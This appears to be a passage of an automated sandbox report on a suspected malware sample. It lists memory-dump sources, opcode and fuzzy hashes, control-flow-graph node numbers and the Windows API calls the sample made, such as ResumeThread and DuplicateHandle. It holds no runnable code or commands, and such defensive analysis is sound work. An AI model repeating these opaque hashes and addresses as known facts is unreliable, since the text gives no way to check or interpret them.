                                • Opcode Fuzzy Hash: 87e3fd2f0c4ca2ea651550f192e508051bfb8a4b02ba848b7f057c726c9fa6e0
                                • Instruction Fuzzy Hash: A7F0493610838ADFCB02CF24D885D947BF6FF0631432984DAE0588B663D736E866DB61
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3902189949.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_6f40000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 64bfef96cc1e34939510de327ef58d966304b9dc3a96093a3b56c39d71052381
                                • Instruction ID: 16a2babf5670097f84052a3b401b56e44e581b0f0810341aa84e445c25bc6df7
                                • Opcode Fuzzy Hash: 64bfef96cc1e34939510de327ef58d966304b9dc3a96093a3b56c39d71052381
                                • Instruction Fuzzy Hash: 16E0D870E152486FDF60EEB8CD19B5B7FAD9B43214F1048E5E804C754AE176CD42C791
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3905896469.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_7630000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5669996b9e1edc291239b52b2e07b8019aa5a71ec8b2530eda36ad5f8f77f6ef
                                • Instruction ID: 7171c43e1160bab8093e7a5ac1aec86c0f9aea4bbcd283d490c1f0483e4d4b77
                                • Opcode Fuzzy Hash: 5669996b9e1edc291239b52b2e07b8019aa5a71ec8b2530eda36ad5f8f77f6ef
                                • Instruction Fuzzy Hash: 37F030B5E00718AF8B34DFB9D80049AFBF9EF49610B00856AE456D3600D731E914CB90
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3902189949.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_6f40000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9abb8a3cb9058a72a089f1ce726e12d4232abfaaa869381f4186cf828d295f87
                                • Instruction ID: 2555ebc75672d5510d44da89ed90c22f1bb5287b76609747332aa78923f4193c
                                • Opcode Fuzzy Hash: 9abb8a3cb9058a72a089f1ce726e12d4232abfaaa869381f4186cf828d295f87
                                • Instruction Fuzzy Hash: DBF0B231A54229EBDB14EB94E899BAEBBB2FF48701F200119E402A7684CB705C42CBC0
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3905896469.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_7630000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 66ef4c187bc20c9ce2d941786c2b775694505bc3c2846d45add3ccb049468d8c
                                • Instruction ID: 4d9e09aa7fc7d488886a1a0e26e700f66b02e5dbb14f7dbef62e21f2ed542555
                                • Opcode Fuzzy Hash: 66ef4c187bc20c9ce2d941786c2b775694505bc3c2846d45add3ccb049468d8c
                                • Instruction Fuzzy Hash: D3D0A76262956457D604B1E8A4113D827594B46210F00006B811DC7142CD5DCC0287EA
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3905896469.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_7630000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7d3e1d1e9adf0b99a8fbd3fbed0c1d3b4f95edc55d99ec16c1de42d24af50174
                                • Instruction ID: 503aa675cb092f2640059e0426abbdbc4ac9bfe645faa3d9401e0f6e24efb1f0
                                • Opcode Fuzzy Hash: 7d3e1d1e9adf0b99a8fbd3fbed0c1d3b4f95edc55d99ec16c1de42d24af50174
                                • Instruction Fuzzy Hash: 20C08C733151281BC614B2ECF061AEF7B9E8B89A60F14402BE21D87B408FD59C8142FA
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3905896469.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_7630000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b0fad5c1dc58d232c89b39453549466d29066cc2fdf78ed34e57598126885bde
                                • Instruction ID: df581ad7559efb4615c0f0dd80d1ccdfc5c1a7cea4095947f9770adb050c2b15
                                • Opcode Fuzzy Hash: b0fad5c1dc58d232c89b39453549466d29066cc2fdf78ed34e57598126885bde
                                • Instruction Fuzzy Hash: 29B0926232523C13DA1831DDA420AAF769E8B89E60F54406BA60E977818ED69C4102EE
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3905896469.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_7630000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 568599575f69d59b74c89ca7f4d713422d1c43ba98925a3e63c09c2bcdcf6bca
                                • Instruction ID: d7b4caed4ed2c4f465b8bf31de806207a45258c22d436d34642269c8da600f06
                                • Opcode Fuzzy Hash: 568599575f69d59b74c89ca7f4d713422d1c43ba98925a3e63c09c2bcdcf6bca
                                • Instruction Fuzzy Hash: C0B09B6132523813D90471DD64206DD769E4789A60F40406B960D877414DD59C4146EE
                                Memory Dump Source
                                • Source File: 0000000F.00000002.3905896469.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_7630000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0bfeec3af82b1912f6daebc48f66f5fdcfe05d52df61e5aab298e7511345290d
                                • Instruction ID: 39ef9d12ced2df2367c660f14d6b7f1d6f9936a9035d2fdb7338bb4cbeeddb3b
                                • Opcode Fuzzy Hash: 0bfeec3af82b1912f6daebc48f66f5fdcfe05d52df61e5aab298e7511345290d
                                • Instruction Fuzzy Hash: 8AD0C9B084421ACFEF659FC0C858BEEBB71BB08715F000419D012A6194CBB9058ACF51

                                Execution Graph

                                Execution Coverage:6.3%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:106
                                Total number of Limit Nodes:2

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                Memory Dump Source
                                • Source File: 00000010.00000002.1556571049.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_1700000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 05740bf21f0e323a3ada6793dd3c33124f7a3ff117ded377f56c255ecea786ea
                                • Instruction ID: 280f3eb50bd7b634dd4b706fa15fa0988266c21892bf5998188101a6dfd9d4b0
                                • Opcode Fuzzy Hash: 05740bf21f0e323a3ada6793dd3c33124f7a3ff117ded377f56c255ecea786ea
                                • Instruction Fuzzy Hash: 45814574A00B05CFE726DF29D44875AFBF1FF88200F108929D48AD7A91D775E945CB91

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1170 170590c-170590e 1171 1705910-1705912 1170->1171 1172 1705915-1705916 1170->1172 1173 1705914 1171->1173 1174 1705919-170591c 1171->1174 1175 1705918 1172->1175 1176 170591d-17059d9 CreateActCtxA 1172->1176 1173->1172 1174->1176 1175->1174 1178 17059e2-1705a3c 1176->1178 1179 17059db-17059e1 1176->1179 1186 1705a4b-1705a4f 1178->1186 1187 1705a3e-1705a41 1178->1187 1179->1178 1188 1705a60 1186->1188 1189 1705a51-1705a5d 1186->1189 1187->1186 1191 1705a61 1188->1191 1189->1188 1191->1191
                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 017059C9
                                Memory Dump Source
                                • Source File: 00000010.00000002.1556571049.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_1700000_sgxIb.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: 37f6a7c317b64b4e4dbcee6b2dd59ea9809ca48ebb883ced2ba71b44712299a2
                                • Instruction ID: 3bd752761a35a534c3a74db51c3f68f759b4ad8519126745c8776ec11e7fe64e
                                • Opcode Fuzzy Hash: 37f6a7c317b64b4e4dbcee6b2dd59ea9809ca48ebb883ced2ba71b44712299a2
                                • Instruction Fuzzy Hash: 1941D0B0C00719CFDB25CFAAC88479EFBF5AB89714F20806AD408AB291DB756946CF50

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1192 1704514-17059d9 CreateActCtxA 1197 17059e2-1705a3c 1192->1197 1198 17059db-17059e1 1192->1198 1205 1705a4b-1705a4f 1197->1205 1206 1705a3e-1705a41 1197->1206 1198->1197 1207 1705a60 1205->1207 1208 1705a51-1705a5d 1205->1208 1206->1205 1210 1705a61 1207->1210 1208->1207 1210->1210
                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 017059C9
                                Memory Dump Source
                                • Source File: 00000010.00000002.1556571049.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_1700000_sgxIb.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: b15026c9199b5ace4daff2f923342e6b2d1edfc67c65485713e242664b710320
                                • Instruction ID: 45bc10db409453fcc3dc4e9f6463532b146479ea665b4f388a80d7b2dbaae483
                                • Opcode Fuzzy Hash: b15026c9199b5ace4daff2f923342e6b2d1edfc67c65485713e242664b710320
                                • Instruction Fuzzy Hash: 6141B2B0C00719CBDB25CFA9C88479EFBF5BF49704F20846AD508AB291DB756945CF50

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1211 58643a0-58643dc 1213 58643e2-58643e7 1211->1213 1214 586448c-58644ac 1211->1214 1215 586443a-5864472 CallWindowProcW 1213->1215 1216 58643e9-5864420 1213->1216 1220 58644af-58644bc 1214->1220 1218 5864474-586447a 1215->1218 1219 586447b-586448a 1215->1219 1223 5864422-5864428 1216->1223 1224 5864429-5864438 1216->1224 1218->1219 1219->1220 1223->1224 1224->1220
                                APIs
                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 05864461
                                Memory Dump Source
                                • Source File: 00000010.00000002.1559928013.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_5860000_sgxIb.jbxd
                                Similarity
                                • API ID: CallProcWindow
                                • String ID:
                                • API String ID: 2714655100-0
                                • Opcode ID: 60a61f635cf03a81ae88239955942b3d79df659b9ec9f426d9be4cc7c918e67c
                                • Instruction ID: 4dcfba6466753e07756058b2613c3ed65c86eec3b6574589ee8eaf7fe915869b
                                • Opcode Fuzzy Hash: 60a61f635cf03a81ae88239955942b3d79df659b9ec9f426d9be4cc7c918e67c
                                • Instruction Fuzzy Hash: B841F7B49003098FDB14CF99C489AAEBBF6FB88314F24C459D919AB361D774A845CBA0

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1226 170b750-170d794 DuplicateHandle 1229 170d796-170d79c 1226->1229 1230 170d79d-170d7ba 1226->1230 1229->1230
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0170D6C6,?,?,?,?,?), ref: 0170D787
                                Memory Dump Source
                                • Source File: 00000010.00000002.1556571049.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_1700000_sgxIb.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: b322540bb28ff9513f16100ef41133c2db8cda1d69019279ef310cff22fed805
                                • Instruction ID: 15eda062edbc6ae2150801af4351604be22e9cc27edeee70197c41360c560a86
                                • Opcode Fuzzy Hash: b322540bb28ff9513f16100ef41133c2db8cda1d69019279ef310cff22fed805
                                • Instruction Fuzzy Hash: 7421E5B5900349DFDB10CFAAD884ADEFBF4EB48310F14846AE914A7350D374A950CFA4

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1233 170d6f9-170d6fa 1234 170d701-170d794 DuplicateHandle 1233->1234 1235 170d6fc-170d6ff 1233->1235 1236 170d796-170d79c 1234->1236 1237 170d79d-170d7ba 1234->1237 1235->1234 1236->1237
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0170D6C6,?,?,?,?,?), ref: 0170D787
                                Memory Dump Source
                                • Source File: 00000010.00000002.1556571049.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_1700000_sgxIb.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 28812a25ce7cbd754fe6ac27b549715ef61faf8d932ad962feb3e2a7e4901455
                                • Instruction ID: 735fc12332ba3e15bf7eeac2a68dcd25377b5f5519f75f7eb6427c0681fcae6a
                                • Opcode Fuzzy Hash: 28812a25ce7cbd754fe6ac27b549715ef61faf8d932ad962feb3e2a7e4901455
                                • Instruction Fuzzy Hash: B621F4B5900349DFDB10CFAAD584ADEFBF4EB48310F14841AE958A3350D374A940CFA4

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1240 5ecfbc0-5ecfc2f ResumeThread 1243 5ecfc38-5ecfc5d 1240->1243 1244 5ecfc31-5ecfc37 1240->1244 1244->1243
                                APIs
                                Memory Dump Source
                                • Source File: 00000010.00000002.1560912273.0000000005EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_5ec0000_sgxIb.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: 2cbf9e3347729e7c87e605e09e456e9c1704a2928e6cd49cef3cec5520e638d1
                                • Instruction ID: 4eefa74cc7e7fa223e77d4924a55f4ae6fac3335f00311f9c9e61eb48e346fba
                                • Opcode Fuzzy Hash: 2cbf9e3347729e7c87e605e09e456e9c1704a2928e6cd49cef3cec5520e638d1
                                • Instruction Fuzzy Hash: 681128B19003498BDB10DFAAC4457DEFBF5EB88314F148419D559A7240C779A545CBA4

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1248 170b2f8-170b338 1250 170b340-170b36b GetModuleHandleW 1248->1250 1251 170b33a-170b33d 1248->1251 1252 170b374-170b388 1250->1252 1253 170b36d-170b373 1250->1253 1251->1250 1253->1252
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0170B35E
                                Memory Dump Source
                                • Source File: 00000010.00000002.1556571049.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_1700000_sgxIb.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: b6b3d2db1a48419aab4b36597eb6a2ed62fcc357faaaba96f2febf0fde8d91eb
                                • Instruction ID: 59ad5f77da83eff7f841a5782137d1d6101a333c148bcb460e3da330785c08ed
                                • Opcode Fuzzy Hash: b6b3d2db1a48419aab4b36597eb6a2ed62fcc357faaaba96f2febf0fde8d91eb
                                • Instruction Fuzzy Hash: E4110FB5C00349CFDB14CF9AC444A9EFBF4EB88210F20842AD919A7250C379A645CFA5
                                Memory Dump Source
                                • Source File: 00000010.00000002.1554300793.00000000013ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 013ED000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_13ed000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 87c4986eee9d23f9e6755197b15d5b310e47027e9b7f216978da2085db53160e
                                • Instruction ID: 03ace8be42ca9f6943b510bda82ed8933a6b2e251a65a775d1e35d532cb9a473
                                • Opcode Fuzzy Hash: 87c4986eee9d23f9e6755197b15d5b310e47027e9b7f216978da2085db53160e
                                • Instruction Fuzzy Hash: C221D071604344DFDB15DF54D9C8B26BFA5FB84218F28C569D80A4B686C336D847CA62
                                Memory Dump Source
                                • Source File: 00000010.00000002.1554300793.00000000013ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 013ED000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_13ed000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 74a34b1a13ee45594b414034a51c29cf7791606df5f705b497064d77fcf2824e
                                • Instruction ID: e23980a5dedae20fab238350c24faa9b92604ad1fb52c238f6618cf124d1802a
                                • Opcode Fuzzy Hash: 74a34b1a13ee45594b414034a51c29cf7791606df5f705b497064d77fcf2824e
                                • Instruction Fuzzy Hash: 65210475904344EFDB05DF94D9C8B26BBA5FB84328F24C5ADE8094B2D2C336D846CA62
                                Memory Dump Source
                                • Source File: 00000010.00000002.1554300793.00000000013ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 013ED000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_13ed000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                • Instruction ID: 39c30b0b0d6fbe90de010e547f742433f399e278772578f5b1224a0041320ef4
                                • Opcode Fuzzy Hash: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                • Instruction Fuzzy Hash: EC11BB75504280DFCB02CF54C5C4B15BBB1FB84228F28C6AAD8494B696C33AD44ACB61
                                Memory Dump Source
                                • Source File: 00000010.00000002.1554300793.00000000013ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 013ED000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_13ed000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                • Instruction ID: 96dea07d7319bd1b7a23a4f6d48e33b344e98e261c89a47abd0136f58b5e1974
                                • Opcode Fuzzy Hash: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                • Instruction Fuzzy Hash: B5119075504380DFDB16CF54D5C4B15FFA1FB44318F28C6AAD8494B696C33AD84ACB61
                                Memory Dump Source
                                • Source File: 00000010.00000002.1554218649.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_13dd000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bf4240048954301c411da6cc83e71d5e3bed13806c29c53a1d726461927e2c90
                                • Instruction ID: e4e3dc98b8010907682cbc4470cac0b20a8f4691e6a9c25b8afb280aeacd3bb2
                                • Opcode Fuzzy Hash: bf4240048954301c411da6cc83e71d5e3bed13806c29c53a1d726461927e2c90
                                • Instruction Fuzzy Hash: 2F01A2725043849BF7108EA5ED84B66FB9CEF45329F18C49AED094A2D2D6799840CAB2
                                Memory Dump Source
                                • Source File: 00000010.00000002.1554218649.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_13dd000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d7b0c70dceb4629058a49e13a91d2c670b0b5de035a7bc08d2a1d29cc4bc907b
                                • Instruction ID: 38b295ea6bb08a1c5b7854d6439829f406ca43f2b964b71696c7ee57ca83480b
                                • Opcode Fuzzy Hash: d7b0c70dceb4629058a49e13a91d2c670b0b5de035a7bc08d2a1d29cc4bc907b
                                • Instruction Fuzzy Hash: 8CF062724043849FE7118E1AD984B66FFD8EB85739F18C59AED484E2D2C3799844CAB1

                                Execution Graph

                                Execution Coverage:12.5%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:17
                                Total number of Limit Nodes:4

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                Strings
                                Memory Dump Source
                                • Source File: 00000013.00000002.1639915821.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_6dd0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID: $
                                • API String ID: 0-3993045852
                                • Opcode ID: e6a2d9672ed1b9bcd2838c0c1a597c949bbb8694a0dfc78ba38c4c09610e05e3
                                • Instruction ID: 63bc8f1cb8dc5b4342f8f71e9f0784e79dc537fdc13b9596416dae1a796eb5f8
                                • Opcode Fuzzy Hash: e6a2d9672ed1b9bcd2838c0c1a597c949bbb8694a0dfc78ba38c4c09610e05e3
                                • Instruction Fuzzy Hash: A322B075E002149FDF64EBA8D4847AEBBB2FF85320F24856AD456AB340DB35DC45CBA0
                                Memory Dump Source
                                • Source File: 00000013.00000002.1639915821.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_6dd0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f964aadacb29a4b2b0330a3e3f9d656540f85c83a0154cdab572f045afc7f31b
                                • Instruction ID: 7ce771baa7a62deb5949b8b9297102ebfc957f15119f17b9e5118bc43ef7e182
                                • Opcode Fuzzy Hash: f964aadacb29a4b2b0330a3e3f9d656540f85c83a0154cdab572f045afc7f31b
                                • Instruction Fuzzy Hash: 2A629C34E002449FDB54EB68D594AADBBF2FF88310F248569E806EB390DB35ED41CB90

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                Memory Dump Source
                                • Source File: 00000013.00000002.1639915821.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_6dd0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 74aaecb34d75c8a78806b54760e88a52a57815b43dbf73f1390a2af7eb9c5883
                                • Instruction ID: f63bd1098ce3f6cf32b1372911e0d30358e060431ec25405b6316ef93c34b9ca
                                • Opcode Fuzzy Hash: 74aaecb34d75c8a78806b54760e88a52a57815b43dbf73f1390a2af7eb9c5883
                                • Instruction Fuzzy Hash: 9B321C31E10719CFDB14EFA9C8906ADB7B1FF89300F518669D409AB250EF70A985CB91

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                Memory Dump Source
                                • Source File: 00000013.00000002.1639915821.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_6dd0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bde1258bc705db597e31ec9878638db90b374ffb6b948e18b2bc4305fc43c966
                                • Instruction ID: 6e8f2fba86083f72147ab0fe52271b756a37aa71ff9cc4925aef86eba9a7892c
                                • Opcode Fuzzy Hash: bde1258bc705db597e31ec9878638db90b374ffb6b948e18b2bc4305fc43c966
                                • Instruction Fuzzy Hash: 5F027C30B012158FDB55EF68D8946AEBBF2FF88310F158569D816AB390DB35EC46CB90

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 799 302ed70-302ed8b 800 302edb5-302edcb 799->800 801 302ed8d-302edb4 799->801 824 302edcd call 302ed70 800->824 825 302edcd call 302ee58 800->825 804 302edd2-302edd4 805 302edd6-302edd9 804->805 806 302edda-302ee0f 804->806 811 302ee10-302ee39 806->811 814 302ee3b-302ee3e 811->814 815 302ee3f-302ee54 811->815 815->811 817 302ee56-302eecc GlobalMemoryStatusEx 815->817 820 302eed5-302eefd 817->820 821 302eece-302eed4 817->821 821->820 824->804 825->804
                                Memory Dump Source
                                • Source File: 00000013.00000002.1620076652.0000000003020000.00000040.00000800.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_3020000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cc08e864dd900352c76ffd96def18f8dd992f7fd7546cc44bbcc2d3d061c236b
                                • Instruction ID: dee842e99948699f94f05cec8850a8d764591e54840f476fd01af265ad5673e4
                                • Opcode Fuzzy Hash: cc08e864dd900352c76ffd96def18f8dd992f7fd7546cc44bbcc2d3d061c236b
                                • Instruction Fuzzy Hash: 1F412272E143998FCB14DFB5D8042DABFF5AF89210F1986ABD408E7281DB749841CBE1

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 826 302ee58-302eecc GlobalMemoryStatusEx 828 302eed5-302eefd 826->828 829 302eece-302eed4 826->829 829->828
                                APIs
                                • GlobalMemoryStatusEx.KERNELBASE ref: 0302EEBF
                                Memory Dump Source
                                • Source File: 00000013.00000002.1620076652.0000000003020000.00000040.00000800.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_3020000_sgxIb.jbxd
                                Similarity
                                • API ID: GlobalMemoryStatus
                                • String ID:
                                • API String ID: 1890195054-0
                                • Opcode ID: 5014baf1a7caa9e672333dc91c06f0c94a7639f411032696ad9addc409e919bc
                                • Instruction ID: e22017cb56d87065201f57f58bb885835787bfea682e9e646ba0042ce7b9395e
                                • Opcode Fuzzy Hash: 5014baf1a7caa9e672333dc91c06f0c94a7639f411032696ad9addc409e919bc
                                • Instruction Fuzzy Hash: 4411F3B1C1065A9BDB10CF9AC444BDEFBF4AF48320F15816AD818A7640D378A944CFA5

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                Memory Dump Source
                                • Source File: 00000013.00000002.1639915821.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_6dd0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ac5d7f472565c1a2a2d9c445597c95a1891a467955d30aafd65d0f9cb9d096ad
                                • Instruction ID: 93ef260fb409bad2b09afdc1ee2d2a23a439a6e12a65b417c956cc0569f37003
                                • Opcode Fuzzy Hash: ac5d7f472565c1a2a2d9c445597c95a1891a467955d30aafd65d0f9cb9d096ad
                                • Instruction Fuzzy Hash: C0624870A003198FDB55EF68D480A5EBBB2FF88304B208A68D016AF355DB75EC46CB91

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                Memory Dump Source
                                • Source File: 00000013.00000002.1639915821.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_6dd0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ea3cdfb2a607db4de9cf78e5e659ae7b5b75d92a914eba2d44f4bc8b7e2be676
                                • Instruction ID: cf01b8da50833514ebc3cafdfa53a23ddb2232695d2b1acbf524aa3747e3eb1c
                                • Opcode Fuzzy Hash: ea3cdfb2a607db4de9cf78e5e659ae7b5b75d92a914eba2d44f4bc8b7e2be676
                                • Instruction Fuzzy Hash: 42325E34E102099FDB54EF68D890BADBBB6FB88310F118529E405EB391DB39EC45CB91
                                Memory Dump Source
                                • Source File: 00000013.00000002.1639915821.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_6dd0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3e1149f2203adaec7c18974c09e20049e89bb89da224517e6ea821388537f7bc
                                • Instruction ID: d5e9300af053dfae0f9720602484fff7bbb9668cf6958cc06b4685e8ec613db9
                                • Opcode Fuzzy Hash: 3e1149f2203adaec7c18974c09e20049e89bb89da224517e6ea821388537f7bc
                                • Instruction Fuzzy Hash: 692242B4E102099FDF64EF68D4907ADB7B2FB49314F66842AE405EB391DA34DC81CB51

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                Memory Dump Source
                                • Source File: 00000013.00000002.1639915821.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
